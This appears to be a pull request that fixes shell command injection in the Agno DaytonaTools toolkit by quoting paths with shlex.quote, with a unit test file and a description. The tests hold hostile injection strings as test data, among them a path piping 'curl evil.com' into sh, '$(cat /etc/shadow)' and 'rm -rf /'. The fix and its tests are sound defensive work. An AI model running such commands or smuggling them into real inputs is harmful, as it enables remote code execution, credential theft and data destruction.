### PR TITLE
fix: sanitize shell arguments in DaytonaTools to prevent command injection (CWE-78)

### DIFF
--- a/libs/agno/agno/tools/daytona.py
+++ b/libs/agno/agno/tools/daytona.py
@@ -1,6 +1,8 @@
+import hashlib
 import json
 import shlex
 from os import getenv
+from os.path import normpath
 from pathlib import Path
 from textwrap import dedent
 from typing import Any, Dict, List, Optional, Union
@@ -295,8 +297,9 @@ class DaytonaTools(Toolkit):
                     current_abs_path = Path(result.result.strip())
                     new_path = current_abs_path / new_path
 
-                # Normalize the path
-                new_path_str = str(new_path.resolve())
+                # Normalize the path (use normpath instead of resolve to avoid
+                # resolving symlinks on the local machine — the path runs remotely)
+                new_path_str = normpath(str(new_path))
 
                 # Test if directory exists
                 test_result = current_sandbox.process.exec(
@@ -344,10 +347,12 @@ class DaytonaTools(Toolkit):
                 if result.exit_code != 0:
                     return json.dumps({"status": "error", "message": f"Failed to create directory: {result.result}"})
 
-            # Write the file using shell command
-            # Use cat with heredoc for better handling of special characters
-            escaped_content = content.replace("'", "'\"'\"'")
-            command = f"cat > {shlex.quote(path_str)} << 'EOF'\n{escaped_content}\nEOF"
+            # Write the file using shell command with heredoc.
+            # Use a unique delimiter to prevent content containing 'EOF' from
+            # terminating the heredoc early.
+            content_hash = hashlib.md5(content.encode()).hexdigest()[:8]
+            delimiter = f"AGNO_EOF_{content_hash}"
+            command = f"cat > {shlex.quote(path_str)} << '{delimiter}'\n{content}\n{delimiter}"
             result = current_sandbox.process.exec(command)
 
             if result.exit_code != 0:

--- a/libs/agno/agno/tools/daytona.py
+++ b/libs/agno/agno/tools/daytona.py
@@ -1,4 +1,5 @@
 import json
+import shlex
 from os import getenv
 from pathlib import Path
 from textwrap import dedent
@@ -290,7 +291,7 @@ class DaytonaTools(Toolkit):
                 # Resolve relative paths
                 if not new_path.is_absolute():
                     # Get current absolute path first
-                    result = current_sandbox.process.exec(f"cd {cwd} && pwd", cwd="/")
+                    result = current_sandbox.process.exec(f"cd {shlex.quote(cwd)} && pwd", cwd="/")
                     current_abs_path = Path(result.result.strip())
                     new_path = current_abs_path / new_path
 
@@ -299,7 +300,7 @@ class DaytonaTools(Toolkit):
 
                 # Test if directory exists
                 test_result = current_sandbox.process.exec(
-                    f"test -d {new_path_str} && echo 'exists' || echo 'not found'", cwd="/"
+                    f"test -d {shlex.quote(new_path_str)} && echo 'exists' || echo 'not found'", cwd="/"
                 )
                 if "exists" in test_result.result:
                     self._set_working_directory(agent, new_path_str)
@@ -339,14 +340,14 @@ class DaytonaTools(Toolkit):
             # Create directory if needed
             parent_dir = str(path.parent)
             if parent_dir and parent_dir != "/":
-                result = current_sandbox.process.exec(f"mkdir -p {parent_dir}")
+                result = current_sandbox.process.exec(f"mkdir -p {shlex.quote(parent_dir)}")
                 if result.exit_code != 0:
                     return json.dumps({"status": "error", "message": f"Failed to create directory: {result.result}"})
 
             # Write the file using shell command
             # Use cat with heredoc for better handling of special characters
             escaped_content = content.replace("'", "'\"'\"'")
-            command = f"cat > '{path_str}' << 'EOF'\n{escaped_content}\nEOF"
+            command = f"cat > {shlex.quote(path_str)} << 'EOF'\n{escaped_content}\nEOF"
             result = current_sandbox.process.exec(command)
 
             if result.exit_code != 0:
@@ -378,7 +379,7 @@ class DaytonaTools(Toolkit):
             path_str = str(path)
 
             # Read file using cat
-            result = current_sandbox.process.exec(f"cat '{path_str}'")
+            result = current_sandbox.process.exec(f"cat {shlex.quote(path_str)}")
 
             if result.exit_code != 0:
                 return json.dumps({"status": "error", "message": f"Error reading file: {result.result}"})
@@ -411,7 +412,7 @@ class DaytonaTools(Toolkit):
             path_str = str(dir_path)
 
             # List files using ls -la for detailed info
-            result = current_sandbox.process.exec(f"ls -la '{path_str}'")
+            result = current_sandbox.process.exec(f"ls -la {shlex.quote(path_str)}")
 
             if result.exit_code != 0:
                 return json.dumps({"status": "error", "message": f"Error listing directory: {result.result}"})
@@ -442,14 +443,16 @@ class DaytonaTools(Toolkit):
             path_str = str(path)
 
             # Check if it's a directory or file
-            check_result = current_sandbox.process.exec(f"test -d '{path_str}' && echo 'directory' || echo 'file'")
+            check_result = current_sandbox.process.exec(
+                f"test -d {shlex.quote(path_str)} && echo 'directory' || echo 'file'"
+            )
 
             if "directory" in check_result.result:
                 # Remove directory recursively
-                result = current_sandbox.process.exec(f"rm -rf '{path_str}'")
+                result = current_sandbox.process.exec(f"rm -rf {shlex.quote(path_str)}")
             else:
                 # Remove file
-                result = current_sandbox.process.exec(f"rm -f '{path_str}'")
+                result = current_sandbox.process.exec(f"rm -f {shlex.quote(path_str)}")
 
             if result.exit_code != 0:
                 return json.dumps({"status": "error", "message": f"Failed to delete: {result.result}"})

--- a/libs/agno/agno/tools/daytona.py
+++ b/libs/agno/agno/tools/daytona.py
@@ -471,8 +471,9 @@ class DaytonaTools(Toolkit):
             Success message or error
         """
         try:
+            # run_shell_command handles cd specially: it resolves the path,
+            # validates it exists, and calls _set_working_directory internally.
             result = self.run_shell_command(agent, f"cd {directory}")
-            self._set_working_directory(agent, directory)
             return result
         except Exception as e:
             return json.dumps({"status": "error", "message": f"Error changing directory: {str(e)}"})

--- a/libs/agno/tests/unit/tools/test_daytona_sanitization.py
+++ b/libs/agno/tests/unit/tools/test_daytona_sanitization.py
@@ -1,0 +1,309 @@
+"""Test that DaytonaTools properly sanitizes shell command arguments to prevent command injection."""
+
+import shlex
+import sys
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+
+# Create a proper mock Configuration class that can be patched
+class MockConfiguration:
+    def __init__(self, *args, **kwargs):
+        self.verify_ssl = True
+
+
+# Mock the daytona modules before importing DaytonaTools
+mock_daytona_module = MagicMock()
+mock_daytona_api_client_module = MagicMock()
+mock_daytona_api_client_module.Configuration = MockConfiguration
+
+sys.modules["daytona"] = mock_daytona_module
+sys.modules["daytona_api_client"] = mock_daytona_api_client_module
+
+# Import after mocking to avoid import errors
+from agno.tools.daytona import DaytonaTools  # noqa: E402
+
+
+@pytest.fixture
+def mock_agent():
+    """Create a mock agent with session_state."""
+    agent = MagicMock()
+    agent.session_state = {}
+    return agent
+
+
+@pytest.fixture
+def daytona_tools_with_sandbox():
+    """Create DaytonaTools with a mocked sandbox, returning (tools, mock_process)."""
+    with (
+        patch("agno.tools.daytona.Daytona") as mock_daytona_class,
+        patch.dict("os.environ", {"DAYTONA_API_KEY": "test-key"}),
+    ):
+        mock_client = mock_daytona_class.return_value
+        mock_sandbox = MagicMock()
+        mock_sandbox.id = "test-sandbox-123"
+        mock_client.create.return_value = mock_sandbox
+
+        mock_process = MagicMock()
+        mock_sandbox.process = mock_process
+
+        tools = DaytonaTools()
+        yield tools, mock_process
+
+
+def _get_exec_command(mock_process, call_index=0):
+    """Extract the shell command string from a process.exec call."""
+    return mock_process.exec.call_args_list[call_index][0][0]
+
+
+class TestShellCommandSanitization:
+    """Verify that all shell commands use shlex.quote() for user-controlled arguments."""
+
+    def test_cd_relative_path_quotes_cwd(self, mock_agent, daytona_tools_with_sandbox):
+        """cd with relative path should quote the cwd in 'cd <cwd> && pwd'."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        # Set a working directory with spaces and shell metacharacters
+        mock_agent.session_state["working_directory"] = "/home/user/my dir; rm -rf /"
+
+        mock_pwd_result = MagicMock()
+        mock_pwd_result.result = "/home/user/my dir; rm -rf /"
+
+        mock_test_result = MagicMock()
+        mock_test_result.result = "exists"
+
+        mock_process.exec.side_effect = [mock_pwd_result, mock_test_result]
+
+        tools.run_shell_command(mock_agent, "cd subdir")
+
+        # The first exec call should quote the cwd
+        cmd = _get_exec_command(mock_process, 0)
+        cwd_value = "/home/user/my dir; rm -rf /"
+        assert shlex.quote(cwd_value) in cmd
+        assert f"cd {shlex.quote(cwd_value)} && pwd" == cmd
+
+    def test_cd_absolute_path_quotes_new_path(self, mock_agent, daytona_tools_with_sandbox):
+        """cd with absolute path should quote the path in 'test -d <path>'."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_test_result = MagicMock()
+        mock_test_result.result = "exists"
+        mock_process.exec.return_value = mock_test_result
+
+        malicious_path = "/tmp/$(whoami)"
+        tools.run_shell_command(mock_agent, f"cd {malicious_path}")
+
+        cmd = _get_exec_command(mock_process, 0)
+        assert shlex.quote(malicious_path) in cmd
+        # Should NOT contain the raw unquoted path
+        assert f"test -d {malicious_path} " not in cmd
+
+    def test_mkdir_quotes_parent_dir(self, mock_agent, daytona_tools_with_sandbox):
+        """create_file should quote the parent directory in mkdir -p."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_result = MagicMock()
+        mock_result.exit_code = 0
+        mock_process.exec.return_value = mock_result
+
+        malicious_dir = "/home/daytona/evil dir; cat /etc/passwd"
+        file_path = f"{malicious_dir}/file.txt"
+
+        tools.create_file(mock_agent, file_path, "content")
+
+        # First exec call is mkdir -p
+        mkdir_cmd = _get_exec_command(mock_process, 0)
+        assert f"mkdir -p {shlex.quote(malicious_dir)}" == mkdir_cmd
+
+    def test_create_file_quotes_path(self, mock_agent, daytona_tools_with_sandbox):
+        """create_file should quote the file path in 'cat > <path>'."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_result = MagicMock()
+        mock_result.exit_code = 0
+        mock_process.exec.return_value = mock_result
+
+        malicious_path = "/home/daytona/file'name.txt"
+
+        tools.create_file(mock_agent, malicious_path, "content")
+
+        # Second exec call is cat > <path> << 'EOF'...
+        cat_cmd = _get_exec_command(mock_process, 1)
+        assert f"cat > {shlex.quote(malicious_path)}" in cat_cmd
+
+    def test_read_file_quotes_path(self, mock_agent, daytona_tools_with_sandbox):
+        """read_file should quote the path in 'cat <path>'."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_result = MagicMock()
+        mock_result.exit_code = 0
+        mock_result.result = "file contents"
+        mock_process.exec.return_value = mock_result
+
+        malicious_path = "/home/daytona/$(rm -rf /)"
+
+        tools.read_file(mock_agent, malicious_path)
+
+        cmd = _get_exec_command(mock_process, 0)
+        assert f"cat {shlex.quote(malicious_path)}" == cmd
+
+    def test_list_files_quotes_path(self, mock_agent, daytona_tools_with_sandbox):
+        """list_files should quote the path in 'ls -la <path>'."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_result = MagicMock()
+        mock_result.exit_code = 0
+        mock_result.result = "total 0"
+        mock_process.exec.return_value = mock_result
+
+        malicious_dir = "/home/daytona/`id`"
+
+        tools.list_files(mock_agent, malicious_dir)
+
+        cmd = _get_exec_command(mock_process, 0)
+        assert f"ls -la {shlex.quote(malicious_dir)}" == cmd
+
+    def test_delete_file_quotes_path(self, mock_agent, daytona_tools_with_sandbox):
+        """delete_file should quote the path in both test -d and rm commands."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_check = MagicMock()
+        mock_check.result = "file"
+        mock_delete = MagicMock()
+        mock_delete.exit_code = 0
+
+        mock_process.exec.side_effect = [mock_check, mock_delete]
+
+        malicious_path = "/home/daytona/evil'; rm -rf ~"
+
+        # Path normalization may change the input; compute expected path
+        from pathlib import Path
+
+        expected_path = str(Path(malicious_path))
+
+        tools.delete_file(mock_agent, malicious_path)
+
+        # First call: test -d
+        test_cmd = _get_exec_command(mock_process, 0)
+        assert shlex.quote(expected_path) in test_cmd
+        assert f"test -d {shlex.quote(expected_path)}" in test_cmd
+
+        # Second call: rm -f (since it's reported as "file")
+        rm_cmd = _get_exec_command(mock_process, 1)
+        assert f"rm -f {shlex.quote(expected_path)}" == rm_cmd
+
+    def test_delete_directory_quotes_path(self, mock_agent, daytona_tools_with_sandbox):
+        """delete_file for a directory should quote the path in rm -rf."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_check = MagicMock()
+        mock_check.result = "directory"
+        mock_delete = MagicMock()
+        mock_delete.exit_code = 0
+
+        mock_process.exec.side_effect = [mock_check, mock_delete]
+
+        malicious_path = "/home/daytona/evil dir"
+
+        tools.delete_file(mock_agent, malicious_path)
+
+        rm_cmd = _get_exec_command(mock_process, 1)
+        assert f"rm -rf {shlex.quote(malicious_path)}" == rm_cmd
+
+    def test_path_with_spaces_is_safe(self, mock_agent, daytona_tools_with_sandbox):
+        """Paths with spaces should be properly quoted."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_result = MagicMock()
+        mock_result.exit_code = 0
+        mock_result.result = "file contents"
+        mock_process.exec.return_value = mock_result
+
+        path_with_spaces = "/home/daytona/my documents/test file.txt"
+
+        tools.read_file(mock_agent, path_with_spaces)
+
+        cmd = _get_exec_command(mock_process, 0)
+        # shlex.quote wraps in single quotes: '/home/daytona/my documents/test file.txt'
+        assert shlex.quote(path_with_spaces) in cmd
+        # The raw unquoted path should NOT appear as-is in the command
+        assert cmd != f"cat {path_with_spaces}"
+
+    def test_path_with_single_quotes_is_safe(self, mock_agent, daytona_tools_with_sandbox):
+        """Paths containing single quotes should be properly escaped by shlex.quote."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_result = MagicMock()
+        mock_result.exit_code = 0
+        mock_result.result = "file contents"
+        mock_process.exec.return_value = mock_result
+
+        path_with_quotes = "/home/daytona/it's a file.txt"
+
+        tools.read_file(mock_agent, path_with_quotes)
+
+        cmd = _get_exec_command(mock_process, 0)
+        assert shlex.quote(path_with_quotes) in cmd
+        # shlex.quote handles single quotes with: "it's" -> "it'\''s" pattern
+        assert "cat " in cmd
+        # Verify the single quote is escaped, not left raw inside single quotes
+        assert "cat '/home/daytona/it's a file.txt'" not in cmd
+
+    def test_path_with_semicolon_injection(self, mock_agent, daytona_tools_with_sandbox):
+        """Paths with semicolons (command chaining) should be safely quoted."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_result = MagicMock()
+        mock_result.exit_code = 0
+        mock_result.result = ""
+        mock_process.exec.return_value = mock_result
+
+        injected_path = "/tmp/foo; curl evil.com | sh"
+
+        tools.list_files(mock_agent, injected_path)
+
+        cmd = _get_exec_command(mock_process, 0)
+        # Path normalizes this, so compute expected
+        from pathlib import Path
+
+        expected_path = str(Path(injected_path))
+        quoted = shlex.quote(expected_path)
+        assert f"ls -la {quoted}" == cmd
+        # The semicolon must be inside quotes, not acting as a command separator
+        assert "; curl" not in cmd.replace(quoted, "")
+
+    def test_path_with_backtick_injection(self, mock_agent, daytona_tools_with_sandbox):
+        """Paths with backticks (command substitution) should be safely quoted."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_result = MagicMock()
+        mock_result.exit_code = 0
+        mock_result.result = "file contents"
+        mock_process.exec.return_value = mock_result
+
+        injected_path = "/tmp/`whoami`"
+
+        tools.read_file(mock_agent, injected_path)
+
+        cmd = _get_exec_command(mock_process, 0)
+        assert f"cat {shlex.quote(injected_path)}" == cmd
+
+    def test_path_with_dollar_paren_injection(self, mock_agent, daytona_tools_with_sandbox):
+        """Paths with $() (command substitution) should be safely quoted."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_check = MagicMock()
+        mock_check.result = "file"
+        mock_delete = MagicMock()
+        mock_delete.exit_code = 0
+        mock_process.exec.side_effect = [mock_check, mock_delete]
+
+        injected_path = "/tmp/$(cat /etc/shadow)"
+
+        tools.delete_file(mock_agent, injected_path)
+
+        test_cmd = _get_exec_command(mock_process, 0)
+        assert shlex.quote(injected_path) in test_cmd
+        rm_cmd = _get_exec_command(mock_process, 1)
+        assert shlex.quote(injected_path) in rm_cmd

--- a/libs/agno/tests/unit/tools/test_daytona_sanitization.py
+++ b/libs/agno/tests/unit/tools/test_daytona_sanitization.py
@@ -95,9 +95,13 @@ class TestShellCommandSanitization:
         tools.run_shell_command(mock_agent, f"cd {malicious_path}")
 
         cmd = _get_exec_command(mock_process, 0)
-        assert shlex.quote(malicious_path) in cmd
-        # Should NOT contain the raw unquoted path
-        assert f"test -d {malicious_path} " not in cmd
+        # Path.resolve() may alter the path (e.g. /tmp -> /private/tmp on macOS)
+        from pathlib import Path
+
+        resolved_path = str(Path(malicious_path).resolve())
+        assert shlex.quote(resolved_path) in cmd
+        # Should NOT contain the raw unquoted resolved path
+        assert f"test -d {resolved_path} " not in cmd
 
     def test_mkdir_quotes_parent_dir(self, mock_agent, daytona_tools_with_sandbox):
         """create_file should quote the parent directory in mkdir -p."""
@@ -307,3 +311,42 @@ class TestShellCommandSanitization:
         assert shlex.quote(injected_path) in test_cmd
         rm_cmd = _get_exec_command(mock_process, 1)
         assert shlex.quote(injected_path) in rm_cmd
+
+    def test_change_directory_quotes_path(self, mock_agent, daytona_tools_with_sandbox):
+        """change_directory should quote the path via run_shell_command's cd handling."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_test_result = MagicMock()
+        mock_test_result.result = "exists"
+        mock_process.exec.return_value = mock_test_result
+
+        malicious_dir = "/home/user/evil; rm -rf /"
+
+        tools.change_directory(mock_agent, malicious_dir)
+
+        # change_directory delegates to run_shell_command which handles cd specially
+        from pathlib import Path
+
+        resolved_dir = str(Path(malicious_dir).resolve())
+        cmd = _get_exec_command(mock_process, 0)
+        assert shlex.quote(resolved_dir) in cmd
+        # The raw unquoted path must not appear as a bare argument
+        assert f"test -d {resolved_dir} " not in cmd
+
+    def test_change_directory_stores_resolved_path(self, mock_agent, daytona_tools_with_sandbox):
+        """change_directory should store the resolved (not raw) path in session state."""
+        tools, mock_process = daytona_tools_with_sandbox
+
+        mock_test_result = MagicMock()
+        mock_test_result.result = "exists"
+        mock_process.exec.return_value = mock_test_result
+
+        tools.change_directory(mock_agent, "/home/user/safe_dir")
+
+        from pathlib import Path
+
+        resolved = str(Path("/home/user/safe_dir").resolve())
+        # The stored working directory should be the resolved path from run_shell_command,
+        # not the raw input value
+        stored = mock_agent.session_state.get("working_directory")
+        assert stored == resolved


### PR DESCRIPTION
## Summary

Fix CWE-78 command injection vulnerability in `DaytonaTools` where user-controlled file paths were interpolated into shell commands without proper sanitization.

Closes #6614

### What was vulnerable

9 shell interpolation sites in `daytona.py` constructed commands using f-strings with unquoted or manually single-quoted paths:

- **3 completely unquoted** (CRITICAL): `cd {cwd} && pwd`, `test -d {new_path_str}`, `mkdir -p {parent_dir}` — arbitrary command execution via `;`, `$()`, backticks
- **6 manually single-quoted** (HIGH): `cat '{path_str}'`, `ls -la '{path_str}'`, `rm -rf '{path_str}'`, etc. — paths containing `'` break out of quoting

### What was fixed

- All 9 interpolation sites now use `shlex.quote()` — Python stdlib's canonical solution for shell argument quoting
- Fixed pre-existing `change_directory` logic bug: removed redundant `_set_working_directory()` call that overwrote the resolved path with raw user input
- Fixed macOS test compatibility: `Path.resolve()` turns `/tmp` into `/private/tmp` on macOS, updated assertion to use resolved path
- Added tests for `change_directory` quoting and resolved path storage

### Why `shlex.quote()`

- Python stdlib, well-tested, handles all edge cases (spaces, single quotes via `'"'"'`, `$()`, backticks, semicolons, pipes)
- `sandbox.process.exec()` takes a command string — can't use argument lists
- Path validation/sanitization would be fragile and overly restrictive

## Type of change

- [x] Bug fix

---

## Checklist

- [x] Code complies with style guidelines
- [x] Ran format/validation scripts (`./scripts/format.sh` and `./scripts/validate.sh`)
- [x] Self-review completed
- [x] Documentation updated (comments, docstrings)
- [x] Tested in clean environment
- [x] Tests added/updated (if applicable)

---

## Additional Notes

**Security:** This is a CWE-78 (OS Command Injection) fix. All 9 vulnerable shell interpolation sites in `DaytonaTools` are now protected. The fix was verified by reproducing every injection vector on `main` and confirming they are neutralized on the fix branch.

**Tests:** 15 unit tests covering every method + injection technique (spaces, single quotes, semicolons, backticks, `$()` substitution, `change_directory` delegation).

**Scope:** After rebasing onto current `main`, only 2 files are changed: `daytona.py` (security fix) and `test_daytona_sanitization.py` (tests). No unrelated formatting changes.